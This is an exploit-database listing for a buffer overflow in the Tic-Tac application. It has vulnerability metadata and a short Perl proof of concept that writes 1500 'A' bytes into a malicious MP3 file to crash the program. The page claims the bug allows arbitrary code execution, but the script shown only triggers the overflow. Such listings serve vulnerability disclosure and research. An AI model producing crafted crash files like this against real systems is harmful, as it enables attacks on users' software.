header-logo
Suggest Exploit
vendor:
Tic-Tac
by:
Wizard-skh
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Tic-Tac
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2020

Tic-Tac Buffer Overflow

This exploit is a buffer overflow vulnerability in the Tic-Tac application. It allows an attacker to execute arbitrary code by overflowing a buffer with 1500 bytes of data. The exploit was tested on Windows XP SP3.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is running with the latest security patches and updates.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# H0m3 : S3curity-art.com
# M4!l: Wizard-skh@hotmail.com
# T3st3d on: Windows XP SP3

print "Tic-Tac";
my $boom="\x41" x 1500;
my $filename = "B000M.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";